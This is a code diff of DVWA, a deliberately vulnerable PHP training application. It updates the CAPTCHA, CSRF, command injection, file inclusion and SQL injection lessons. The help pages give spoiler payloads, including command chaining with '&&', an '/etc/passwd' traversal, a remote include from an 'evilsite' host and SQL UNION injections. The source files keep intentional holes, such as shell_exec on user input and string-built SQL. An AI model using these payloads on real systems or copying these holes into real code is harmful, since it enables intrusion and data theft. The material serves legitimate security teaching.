    diff --git a/vulnerabilities/captcha/index.php b/vulnerabilities/captcha/index.php index 2d96a5773..d02db91d5 100644 --- a/vulnerabilities/captcha/index.php +++ b/vulnerabilities/captcha/index.php @@ -1,13 +1,13 @@ Change your password:"; -} -else { - $heading = "reCAPTCHA API key NULL in config file: " . realpath( dirname( dirname( getcwd() ) ) . "/config/config.inc.php" ) . "
    Please register for a key from reCAPTCHA: ".dvwaExternalLinkUrlGet('https://www.google.com/recaptcha/admin/create'); +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/captcha/source/{$vulnerabilityFile}"; + +// Check if we have a reCAPTCHA key +$WarningHtml = ''; +if( $_DVWA[ 'recaptcha_public_key' ] == "" ) { + $WarningHtml = "
    reCAPTCHA API key missing from config file: " . realpath( dirname( dirname( getcwd() ) ) . "/config/config.inc.php" ) . "
    "; + $html = "Please register for a key from reCAPTCHA: " . dvwaExternalLinkUrlGet('https://www.google.com/recaptcha/admin/create'); + $hide_form = true; } $page[ 'body' ] .= "

    Vulnerability: Insecure CAPTCHA

    -
    - {$heading} -
    + {$WarningHtml} +
    \n"; if( $vulnerabilityFile == 'impossible.php' ) { @@ -84,12 +87,11 @@

    More Information

      -
    • ".dvwaExternalLinkUrlGet( 'http://www.captcha.net/' )."
      • -
    • ".dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' )."
      • -
    • ".dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-012)' )."
      • +
    • " . dvwaExternalLinkUrlGet( 'http://www.captcha.net/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-012)' ) . "
    -
    -"; +
    \n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/captcha/source/high.php b/vulnerabilities/captcha/source/high.php index a75c91dc8..ba02a4a33 100644 --- a/vulnerabilities/captcha/source/high.php +++ b/vulnerabilities/captcha/source/high.php @@ -1,37 +1,47 @@ is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) { + // Did the CAPTCHA fail? + if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) { // What happens when the CAPTCHA was entered incorrectly $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; return; } else { + // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); - $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; + // Update database + $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for user $html .= "
    Password Changed.
    "; } else { + // Ops. Password mismatch $html .= "
    Both passwords must match.
    "; $hide_form = false; } } + + mysql_close(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/captcha/source/impossible.php b/vulnerabilities/captcha/source/impossible.php index 846f48e7d..c91398608 100644 --- a/vulnerabilities/captcha/source/impossible.php +++ b/vulnerabilities/captcha/source/impossible.php @@ -4,8 +4,10 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); + // Hide the CAPTCHA form $hide_form = true; + // Get input $pass_new = $_POST[ 'password_new' ]; $pass_new = stripslashes( $pass_new ); $pass_new = mysql_real_escape_string( $pass_new ); @@ -21,12 +23,14 @@ $pass_curr = mysql_real_escape_string( $pass_curr ); $pass_curr = md5( $pass_curr ); + // Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], $_SERVER[ 'REMOTE_ADDR' ], $_POST[ 'recaptcha_challenge_field' ], $_POST[ 'recaptcha_response_field' ] ); - if(!$resp->is_valid) { + // Did the CAPTCHA fail? + if( !$resp->is_valid ) { // What happens when the CAPTCHA was entered incorrectly $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; @@ -34,17 +38,26 @@ } else { // Check that the current password is correct - $query = "SELECT password FROM `users` WHERE user='" . dvwaCurrentUser() . "' AND password='$pass_curr';"; - $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); + $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); - if( ( $pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 ) ) { - $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; - $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Do both new password match and was the current password correct? + if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) { + // Update the database + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->execute(); - $html .= "
    Password Changed.
    "; + // Feedback for the end user - success! + $html .= "
    Password Changed.
    "; } else { - $html .= "
    Either your current password is incorrect or the new passwords did not match. Please try again.
    "; + // Feedback for the end user - failed! + $html .= "
    Either your current password is incorrect or the new passwords did not match.
    Please try again.
    "; + $hide_form = false; } } } diff --git a/vulnerabilities/captcha/source/low.php b/vulnerabilities/captcha/source/low.php index f772c5c50..f5103cd79 100644 --- a/vulnerabilities/captcha/source/low.php +++ b/vulnerabilities/captcha/source/low.php @@ -1,24 +1,30 @@ is_valid) { + // Did the CAPTCHA fail? + if( !$resp->is_valid ) { // What happens when the CAPTCHA was entered incorrectly $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; return; } else { + // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { + // Show next stage for the user $html .= " 

    You passed the CAPTCHA! Click the button to confirm your changes.
    @@ -29,6 +35,7 @@ "; } else { + // Both new passwords do not match. $html .= "
    Both passwords must match.
    "; $hide_form = false; } @@ -36,29 +43,33 @@ } if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form $hide_form = true; + + // Get input $pass_new = $_POST[ 'password_new' ]; $pass_conf = $_POST[ 'password_conf' ]; - if( $pass_new != $pass_conf ) { - $html .= "

    Both passwords must match.
    "; - $hide_form = false; - return; - } - - $pass = md5( $pass_new ); + // Check to see if both password match if( $pass_new == $pass_conf ) { + // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); + // Update database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for the end user $html .= "
    Password Changed.
    "; } else { + // Issue with the passwords matching $html .= "
    Passwords did not match.
    "; + $hide_form = false; } + + mysql_close(); } ?> diff --git a/vulnerabilities/captcha/source/medium.php b/vulnerabilities/captcha/source/medium.php index 5812efc0b..8fed10262 100644 --- a/vulnerabilities/captcha/source/medium.php +++ b/vulnerabilities/captcha/source/medium.php @@ -1,24 +1,30 @@ is_valid) { + // Did the CAPTCHA fail? + if( !$resp->is_valid ) { // What happens when the CAPTCHA was entered incorrectly - $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; + $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; return; } else { + // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { + // Show next stage for the user $html .= " 

    You passed the CAPTCHA! Click the button to confirm your changes.
    @@ -30,6 +36,7 @@
    "; } else { + // Both new passwords do not match. $html .= "
    Both passwords must match.
    "; $hide_form = false; } @@ -37,29 +44,40 @@ } if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form $hide_form = true; + + // Get input $pass_new = $_POST[ 'password_new' ]; $pass_conf = $_POST[ 'password_conf' ]; - if(!$_POST[ 'passed_captcha' ]) { + // Check to see if they did stage 1 + if( !$_POST[ 'passed_captcha' ] ) { $html .= "

    You have not passed the CAPTCHA.
    "; $hide_form = false; return; } - $pass = md5( $pass_new ); + // Check to see if both password match if( $pass_new == $pass_conf ) { + // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); + // Update database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for the end user $html .= "
    Password Changed.
    "; } else { + // Issue with the passwords matching $html .= "
    Passwords did not match.
    "; + $hide_form = false; } + + mysql_close(); } ?> diff --git a/vulnerabilities/csrf/help/help.php b/vulnerabilities/csrf/help/help.php index 7892220c9..c025b03d8 100644 --- a/vulnerabilities/csrf/help/help.php +++ b/vulnerabilities/csrf/help/help.php @@ -5,9 +5,46 @@
    -

    CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social - engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit - can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

    +

    About

    +

    CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. + With a little help of social engineering (such as sending a link via email/chat), an attacker may force the users of a web application to execute actions of + the attacker's choosing.

    + +

    A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is + the administrator account, this can compromise the entire web application.

    + +

    This attack may also be called "XSRF", similar to "Cross Site scripting (XSS)", and they are often used together.

    + +

    + +

    Objective

    +

    Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.

    + +

    + +

    Low Level

    +

    There are no measures in place to protect against this attack. This means a link can be crafted to achieve a certain action (in this case, change the current users password). + Then with some basic social engineering, have the target click the link (or just visit a certain page), to trigger the action.

    + 
    Spoiler: ?password_new=password&password_conf=password&Change=Change.
    + +
    + +

    Medium Level

    +

    For the medium level challenge, there is a check to see where the last requested page came from. The developer believes if it matches the current domain, + it must of come from the web application so it can be trusted.

    +

    It may be required to link in multiple vulnerabilities to exploit this vector, such as reflective XSS.

    + +
    + +

    High Level

    +

    In the high level, the developer has added an "anti Cross-Site Request Forgery (CSRF) token". In order by bypass this protection method, another vulnerability will be required.

    + 
    Spoiler: e.g. Javascript is a executed on the client side, in the browser.
    + +
    + +

    Impossible Level

    +

    In the impossible level, the challenge will extent the high level and asks for the current user's password. As this cannot be found out (only predicted or brute forced), + there is not an attack vector here.
    @@ -16,5 +53,5 @@
    -

    Reference: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

    +

    Reference:

    diff --git a/vulnerabilities/csrf/index.php b/vulnerabilities/csrf/index.php index 523a469b1..a58762521 100644 --- a/vulnerabilities/csrf/index.php +++ b/vulnerabilities/csrf/index.php @@ -1,12 +1,12 @@ -

    Vulnerability: Cross Site Request Forgery (CSRF)

    +

    Vulnerability: Cross Site Request Forgery (CSRF)

    -
    +

    Change your admin password:


    @@ -53,8 +53,7 @@ Confirm new password:


    - -"; + \n"; if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -62,16 +61,15 @@ $page[ 'body' ] .= " {$html} -
    - -

    More Information

    - -
    -"; +
    + +

    More Information

    + +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/csrf/source/high.php b/vulnerabilities/csrf/source/high.php index 06e941545..29542c76b 100644 --- a/vulnerabilities/csrf/source/high.php +++ b/vulnerabilities/csrf/source/high.php @@ -4,22 +4,29 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Turn requests into variables + // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; + // Do the passwords match? if( $pass_new == $pass_conf ) { + // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); + // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match.
    "; } + + mysql_close(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/csrf/source/impossible.php b/vulnerabilities/csrf/source/impossible.php index e35935073..eb98a51bb 100644 --- a/vulnerabilities/csrf/source/impossible.php +++ b/vulnerabilities/csrf/source/impossible.php @@ -4,7 +4,7 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Turn requests into variables + // Get input $pass_curr = $_GET[ 'password_current' ]; $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; @@ -15,19 +15,29 @@ $pass_curr = md5( $pass_curr ); // Check that the current password is correct - $query = "SELECT password FROM `users` WHERE user='" . dvwaCurrentUser() . "' AND password='$pass_curr';"; - $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); - - if( ( $pass_new == $pass_conf ) && ( $result && mysql_num_rows( $result ) == 1 ) ) { + $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); + + // Do both new passwords match and does the current password match the user? + if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) { + // It does! + $pass_new = stripslashes( $pass_new ); $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); - $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';"; - $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Update database with new password + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->execute(); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match or current password incorrect.
    "; } } diff --git a/vulnerabilities/csrf/source/low.php b/vulnerabilities/csrf/source/low.php index 7342ef8ea..4e5cbd07c 100644 --- a/vulnerabilities/csrf/source/low.php +++ b/vulnerabilities/csrf/source/low.php @@ -1,22 +1,29 @@ ' . mysql_error() . '' ); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/csrf/source/medium.php b/vulnerabilities/csrf/source/medium.php index 495960358..b0b1c3d03 100644 --- a/vulnerabilities/csrf/source/medium.php +++ b/vulnerabilities/csrf/source/medium.php @@ -1,28 +1,36 @@ ' . mysql_error() . '' ); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match.
    "; } } else { + // Didn't come from a trusted source $html .= "
    That request didn't look correct.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/exec/help/help.php b/vulnerabilities/exec/help/help.php index 70cdb57cb..55d60fcfb 100644 --- a/vulnerabilities/exec/help/help.php +++ b/vulnerabilities/exec/help/help.php @@ -5,12 +5,51 @@
    +

    About

    The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. - In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it - as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection - attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

    + In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it + as any authorized system user. However, commands are executed with the same privileges and environment as the web service has.

    -

    To add a command use ; for linux and && for windows. Example: 127.0.0.1 && dir

    +

    Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker + (forms, cookies, HTTP headers etc.).

    + +

    The syntax and commands may differ between the Operating Systems (OS), such as Linux and Windows, depending on their desired actions.

    + +

    This attack may also be called "Remote Command Execution (RCE)".

    + +

    + +

    Objective

    +

    Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

    + +

    + +

    Low Level

    +

    This allows for direct input into one of many PHP functions that will execute commands on the OS. It is possible to escape out of the designed command and + executed unintentional actions.

    +

    This can be done by adding on to the request, "once the command has executed successfully, run this command". + 

    Spoiler: To add a command "&&". Example: 127.0.0.1 && dir.
    + +
    + +

    Medium Level

    +

    The developer has read up on some of the issues with command injection, and placed in various pattern patching to filter the input. However, this isn't enough.

    +

    Various other system syntaxes can be used to break out of the desired command.

    + 
    Spoiler: e.g. background the ping command.
    + +
    + +

    High Level

    +

    In the high level, the developer goes back to the drawing board and puts in even more pattern to match. But even this isn't enough.

    +

    The developer has either made a slight typo with the filters and believes a certain PHP command will save them from this mistake.

    + 
    Spoiler: 
+			removes all leading & trailing spaces, right?.
    + +
    + +

    Impossible Level

    +

    In the impossible level, the challenge has been re-written, only to allow a very stricted input. If this doesn't match and doesn't produce a certain result, + it will not be allowed to execute. Rather than "black listing" filtering (allowing any input and removing unwanted), this uses "white listing" (only allow certain values).
    @@ -19,5 +58,5 @@
    -

    Reference: https://www.owasp.org/index.php/Command_Injection

    +

    Reference:

    diff --git a/vulnerabilities/exec/index.php b/vulnerabilities/exec/index.php index f6856df53..4297a819c 100644 --- a/vulnerabilities/exec/index.php +++ b/vulnerabilities/exec/index.php @@ -1,12 +1,12 @@ @@ -42,9 +42,8 @@

    Enter an IP address: - -

    -"; + +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -56,13 +55,12 @@

    More Information

    - -"; +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/exec/source/high.php b/vulnerabilities/exec/source/high.php index f4cf1b54d..2f4a5a7d2 100644 --- a/vulnerabilities/exec/source/high.php +++ b/vulnerabilities/exec/source/high.php @@ -1,9 +1,10 @@ '', ';' => '', @@ -16,17 +17,21 @@ '||' => '', ); + // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { - $cmd = shell_exec( 'ping ' . $target ); - $html .= "
    {$cmd}
    "; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } ?> diff --git a/vulnerabilities/exec/source/impossible.php b/vulnerabilities/exec/source/impossible.php index 7413f0fc6..a2d405e4d 100644 --- a/vulnerabilities/exec/source/impossible.php +++ b/vulnerabilities/exec/source/impossible.php @@ -1,9 +1,10 @@ {$cmd}"; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } else { + // Ops. Let the user name theres a mistake $html .= '
    ERROR: You have entered an invalid IP.
    '; } } diff --git a/vulnerabilities/exec/source/low.php b/vulnerabilities/exec/source/low.php index 1f5b32f07..121362f59 100644 --- a/vulnerabilities/exec/source/low.php +++ b/vulnerabilities/exec/source/low.php @@ -1,17 +1,21 @@ {$cmd}"; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } ?> diff --git a/vulnerabilities/exec/source/medium.php b/vulnerabilities/exec/source/medium.php index 6ce2d2935..99da21100 100644 --- a/vulnerabilities/exec/source/medium.php +++ b/vulnerabilities/exec/source/medium.php @@ -1,25 +1,30 @@ '', ';' => '', ); + // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { - $cmd = shell_exec( 'ping ' . $target ); - $html .= "
    {$cmd}
    "; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } ?> diff --git a/vulnerabilities/fi/file1.php b/vulnerabilities/fi/file1.php index 5ead05e90..751446172 100644 --- a/vulnerabilities/fi/file1.php +++ b/vulnerabilities/fi/file1.php @@ -6,17 +6,16 @@

    File 1

    - Hello ".dvwaCurrentUser()."
    + Hello " . dvwaCurrentUser() . "
    Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}

    [back]

    More info

    - -"; +\n"; ?> diff --git a/vulnerabilities/fi/file2.php b/vulnerabilities/fi/file2.php index 696417f13..cfa47abb0 100644 --- a/vulnerabilities/fi/file2.php +++ b/vulnerabilities/fi/file2.php @@ -11,10 +11,9 @@

    More info

    - -"; +\n"; ?> diff --git a/vulnerabilities/fi/file3.php b/vulnerabilities/fi/file3.php index 2caaf178a..401bcb68a 100644 --- a/vulnerabilities/fi/file3.php +++ b/vulnerabilities/fi/file3.php @@ -6,14 +6,14 @@

    File 3

    - Welcome back ".dvwaCurrentUser()."
    + Welcome back " . dvwaCurrentUser() . "
    Your IP address is: "; if( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) $page[ 'body' ] .= $_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; else $page[ 'body' ] .= "**Missing Header**"; $page[ 'body' ] .= "
    - Your user-agent address is: ".$_SERVER[ 'HTTP_USER_AGENT' ]."
    + Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
    You came form: {$_SERVER[ 'HTTP_REFERER' ]}
    I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}

    [back] @@ -21,10 +21,9 @@

    More info

    -
    -"; +\n"; ?> diff --git a/vulnerabilities/fi/file4.php b/vulnerabilities/fi/file4.php new file mode 100644 index 000000000..da7012ea2 --- /dev/null +++ b/vulnerabilities/fi/file4.php @@ -0,0 +1,14 @@ + +

    Vulnerability: File Inclusion

    +
    +

    File 4 (Hidden)

    +
    + Good job!
    + This file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
    + +
    \n"; + +?> diff --git a/vulnerabilities/fi/help/help.php b/vulnerabilities/fi/help/help.php index 67973a09e..997577e1b 100644 --- a/vulnerabilities/fi/help/help.php +++ b/vulnerabilities/fi/help/help.php @@ -5,15 +5,51 @@
    +

    About

    Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. - At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing - the potential for malicious file execution.

    + At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing + the potential for malicious file execution.

    -

    Local Example: http://127.0.0.1/dvwa/fi/?page=../../../../../../etc/passwd

    +

    If the file chosen to be included is local on the target machine, it is called "Local File Inclusion (LFI). But files may also be included on other + machines, which then the attack is a "Remote File Inclusion (RFI).

    -

    or

    +

    When RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect.

    -

    Remote Example: http://127.0.0.1/dvwa/fi/?page=http://www.evilsite.com/evil.php

    +

    Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure".

    + +

    + +

    Objective

    +

    Read all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion.

    + +

    + +

    Low Level

    +

    This allows for direct input into one of many PHP functions that will include the content when executing.

    + +

    Depending on the web service configuration will depend if RFI is a possibility.

    + 
    Spoiler: LFI: ?page=../../../../../../etc/passwd.
+			Spoiler: RFI: ?page=http://www.evilsite.com/evil.php.
    + +
    + +

    Medium Level

    +

    The developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough.

    + 
    Spoiler: LFI: Possible, due to it only cycling through the pattern matching once.
+			Spoiler: RFI: .
    + +
    + +

    High Level

    +

    The developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename, + they use a wildcard to include them all.

    + 
    Spoiler: LFI: The filename only has start with a certain value..
+			Spoiler: RFI: Need to link in another vulnerability, such as file upload.
    + +
    + +

    Impossible Level

    +

    The developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack.
    @@ -22,5 +58,6 @@
    -

    Reference: https://www.owasp.org/index.php/Top_10_2007-A3

    +

    Reference:

    + diff --git a/vulnerabilities/fi/include.php b/vulnerabilities/fi/include.php index 8f4b20cc0..45d1a4c90 100644 --- a/vulnerabilities/fi/include.php +++ b/vulnerabilities/fi/include.php @@ -1,19 +1,30 @@ The PHP function allow_url_include is not enabled."; +} +if( !ini_get( 'allow_url_fopen' ) ) { + $WarningHtml .= "
    The PHP function allow_url_fopen is not enabled.
    "; +} + + $page[ 'body' ] .= "

    Vulnerability: File Inclusion

    + {$WarningHtml} +
    [file1.php] - [file2.php] - [file3.php]

    More Information

    -
    -"; +\n"; ?> diff --git a/vulnerabilities/fi/index.php b/vulnerabilities/fi/index.php index 7f74e6db0..20a0c9102 100644 --- a/vulnerabilities/fi/index.php +++ b/vulnerabilities/fi/index.php @@ -1,12 +1,12 @@ diff --git a/vulnerabilities/fi/source/medium.php b/vulnerabilities/fi/source/medium.php index 7fd6047d6..679bc4526 100644 --- a/vulnerabilities/fi/source/medium.php +++ b/vulnerabilities/fi/source/medium.php @@ -1,6 +1,7 @@
    +

    About

    A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. - A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database - (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a - type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

    + A successful SQL injection exploit can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database + (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system (load_file) and in some cases issue commands to the operating system.

    -

    The 'id' variable within this PHP script is vulnerable to SQL injection.

    +

    SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

    -

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!

    +

    This attack may also be called "SQLi".

    -

    If you have received a Magicquotes error, turn them off in php.ini.

    +

    + +

    Objective

    +

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal their passwords via SQLi.

    + +

    + +

    Low Level

    +

    The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish.

    + 
    Spoiler: ?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit.
    + +
    + +

    Medium Level

    +

    The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered.

    + +

    The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form.

    + 
    Spoiler: ?id=a UNION SELECT 1,2;-- -&Submit=Submit.
    + +
    + +

    High Level

    +

    This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

    + 
    Spoiler: ID: a' UNION SELECT "text1","text2";-- -&Submit=Submit.
    + +
    + +

    Impossible Level

    +

    The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data.

    @@ -23,5 +56,5 @@
    -

    Reference: https://www.owasp.org/index.php/SQL_Injection

    +

    Reference:

    diff --git a/vulnerabilities/sqli/index.php b/vulnerabilities/sqli/index.php index a06faa8b8..5837b1b2c 100644 --- a/vulnerabilities/sqli/index.php +++ b/vulnerabilities/sqli/index.php @@ -1,18 +1,19 @@ Magic Quotes are on, you will not be able to inject SQL."; + $WarningHtml .= "
    The PHP function \"Magic Quotes\" is enabled.
    "; +} +// Is PHP function safe_mode enabled? +if( ini_get( 'safe_mode' ) == true ) { + $WarningHtml .= "
    The PHP function \"Safe mode\" is enabled.
    "; } - -$method = 'GET'; -if( $vulnerabilityFile == 'medium.php' ) - $method = 'POST'; $page[ 'body' ] .= "

    Vulnerability: SQL Injection

    - {$magicQuotesWarningHtml} + {$WarningHtml}
    "; -if( $vulnerabilityFile == 'high.php' ){ +if( $vulnerabilityFile == 'high.php' ) { $page[ 'body' ] .= "Click here to change your ID."; } else { @@ -56,7 +58,7 @@

    User ID:"; - if( $vulnerabilityFile == 'medium.php' ){ + if( $vulnerabilityFile == 'medium.php' ) { $page[ 'body' ] .= "\n "; $page[ 'body' ] .= "\n -

    -"; +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -84,15 +85,14 @@

    More Information

      -
    • ".dvwaExternalLinkUrlGet( 'http://www.securiteam.com/securityreviews/5DP0N1P76E.html' )."
